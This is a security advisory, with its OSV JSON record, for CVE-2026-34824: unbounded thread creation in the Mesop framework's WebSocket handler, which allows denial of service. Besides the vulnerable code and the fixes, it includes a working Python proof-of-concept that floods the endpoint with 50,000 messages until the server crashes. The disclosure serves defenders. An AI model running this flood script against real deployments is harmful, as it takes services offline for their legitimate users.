GHSA-3JR7-6HQP-X679

Vulnerability from github – Published: 2026-04-03 21:54 – Updated: 2026-04-06 23:11
VLAI?
Summary
Mesop: Unbounded Thread Creation in WebSocket Handler Leads to Denial of Service
Details

Summary

An uncontrolled resource consumption vulnerability exists in the WebSocket implementation of the Mesop framework. An unauthenticated attacker can send a rapid succession of WebSocket messages, forcing the server to spawn an unbounded number of operating system threads. This leads to thread exhaustion and Out of Memory (OOM) errors, causing a complete Denial of Service (DoS) for any application built on the framework.

Details

The vulnerability stems from an architectural flaw in how incoming WebSocket messages are processed. In the mesop/server/server.py file, the handle_websocket function listens for incoming messages and immediately spawns a new threading.Thread for every successfully parsed ui_request.

There is no thread pool, message queue, or rate-limiting mechanism implemented to restrict the number of concurrent threads spawned per connection.

Vulnerable code snippet in mesop/server/server.py:

while True:
    message = ws.receive()
    if not message:
        continue
    # ... message parsing logic ...

    # VULNERABILITY: Spawning a new thread for every single message without limits
    thread = threading.Thread(
        target=copy_current_request_context(ws_generate_data),
        args=(ws, ui_request),
        daemon=True,
    )
    thread.start()

PoC

To reproduce this vulnerability, you only need a running instance of a Mesop application and a basic Python script to flood the WebSocket endpoint.

Prerequisites:

Python environment with the websocket-client library installed (pip install websocket-client).

A target Mesop application running locally (e.g., http://localhost:8080).

Steps to reproduce:

Start the target Mesop application.

Save the following script as exploit_dos.py.

Run the script: python exploit_dos.py. Watch the server's resource monitor; memory and thread counts will spike rapidly until the process crashes.

import websocket
import base64

# Replace with the target Mesop application's WebSocket URL
TARGET_WS_URL = "ws://localhost:8080/__ui__"

# A minimal valid base64 payload to bypass `base64.urlsafe_b64decode` 
# and Protobuf `ParseFromString` without throwing a parsing exception.
EMPTY_UI_REQUEST_B64 = base64.urlsafe_b64encode(b'').decode('utf-8')

def flood_server():
    ws = websocket.WebSocket()
    try:
        ws.connect(TARGET_WS_URL)
        print("[+] Connection established. Initiating thread exhaustion attack...")

        # Rapidly send 50,000 messages to force the server to spawn 50,000 threads
        for i in range(50000):
            ws.send(EMPTY_UI_REQUEST_B64)

        print("[+] Payloads sent. The server should be unresponsive or crashed by now.")
        ws.close()
    except Exception as e:
        print(f"[-] Connection closed or server crashed: {e}")

if __name__ == "__main__":
    flood_server()

Impact

Vulnerability Type: Denial of Service (DoS) / CWE-400: Uncontrolled Resource Consumption.

Impacted Parties: Any developer or organization deploying a Mesop-based application to a publicly accessible network.

Severity: High. An unauthenticated external attacker can completely crash the application within seconds using minimal bandwidth from a single machine, rendering the service unavailable to all legitimate users.

Mitigation (Recommended Fixes):

Use a bounded thread pool (e.g., ThreadPoolExecutor with max_workers) Introduce per-connection rate limiting Implement a message queue with backpressure Consider migrating to an async event loop model instead of spawning OS threads

Severity ?
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "mesop"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.2.3"
            },
            {
              "fixed": "1.2.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34824"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-125",
      "CWE-400",
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-03T21:54:36Z",
    "nvd_published_at": "2026-04-03T23:17:05Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAn uncontrolled resource consumption vulnerability exists in the WebSocket implementation of the Mesop framework. An unauthenticated attacker can send a rapid succession of WebSocket messages, forcing the server to spawn an unbounded number of operating system threads. This leads to thread exhaustion and Out of Memory (OOM) errors, causing a complete Denial of Service (DoS) for any application built on the framework.\n\n### Details\nThe vulnerability stems from an architectural flaw in how incoming WebSocket messages are processed. In the `mesop/server/server.py` file, the `handle_websocket` function listens for incoming messages and immediately spawns a new `threading.Thread` for every successfully parsed `ui_request`.\n\nThere is no thread pool, message queue, or rate-limiting mechanism implemented to restrict the number of concurrent threads spawned per connection. \n\n*Vulnerable code snippet in `mesop/server/server.py`:*\n```python\nwhile True:\n    message = ws.receive()\n    if not message:\n        continue\n    # ... message parsing logic ...\n\n    # VULNERABILITY: Spawning a new thread for every single message without limits\n    thread = threading.Thread(\n        target=copy_current_request_context(ws_generate_data),\n        args=(ws, ui_request),\n        daemon=True,\n    )\n    thread.start()\n```\n### PoC\nTo reproduce this vulnerability, you only need a running instance of a Mesop application and a basic Python script to flood the WebSocket endpoint.\n\nPrerequisites:\n\nPython environment with the `websocket-client library` installed (`pip install websocket-client`).\n\nA target Mesop application running locally (e.g., `http://localhost:8080`).\n\nSteps to reproduce:\n\nStart the target Mesop application.\n\nSave the following script as `exploit_dos.py`.\n\nRun the script: python `exploit_dos.py`. Watch the server\u0027s resource monitor; memory and thread counts will spike rapidly until the process crashes.\n\n```\nimport websocket\nimport base64\n\n# Replace with the target Mesop application\u0027s WebSocket URL\nTARGET_WS_URL = \"ws://localhost:8080/__ui__\"\n\n# A minimal valid base64 payload to bypass `base64.urlsafe_b64decode` \n# and Protobuf `ParseFromString` without throwing a parsing exception.\nEMPTY_UI_REQUEST_B64 = base64.urlsafe_b64encode(b\u0027\u0027).decode(\u0027utf-8\u0027)\n\ndef flood_server():\n    ws = websocket.WebSocket()\n    try:\n        ws.connect(TARGET_WS_URL)\n        print(\"[+] Connection established. Initiating thread exhaustion attack...\")\n        \n        # Rapidly send 50,000 messages to force the server to spawn 50,000 threads\n        for i in range(50000):\n            ws.send(EMPTY_UI_REQUEST_B64)\n            \n        print(\"[+] Payloads sent. The server should be unresponsive or crashed by now.\")\n        ws.close()\n    except Exception as e:\n        print(f\"[-] Connection closed or server crashed: {e}\")\n\nif __name__ == \"__main__\":\n    flood_server()\n```\n### Impact\nVulnerability Type: Denial of Service (DoS) / CWE-400: Uncontrolled Resource Consumption.\n\nImpacted Parties: Any developer or organization deploying a Mesop-based application to a publicly accessible network.\n\nSeverity: High. An unauthenticated external attacker can completely crash the application within seconds using minimal bandwidth from a single machine, rendering the service unavailable to all legitimate users.\n\n### Mitigation (Recommended Fixes):\n\nUse a bounded thread pool (e.g., ThreadPoolExecutor with max_workers)\nIntroduce per-connection rate limiting\nImplement a message queue with backpressure\nConsider migrating to an async event loop model instead of spawning OS threads",
  "id": "GHSA-3jr7-6hqp-x679",
  "modified": "2026-04-06T23:11:36Z",
  "published": "2026-04-03T21:54:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34824"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mesop-dev/mesop/commit/760a2079b5c609038c826d24dfbcf9b0be98d987"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mesop-dev/mesop"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mesop-dev/mesop/releases/tag/v1.2.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Mesop: Unbounded Thread Creation in WebSocket Handler Leads to Denial of Service"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.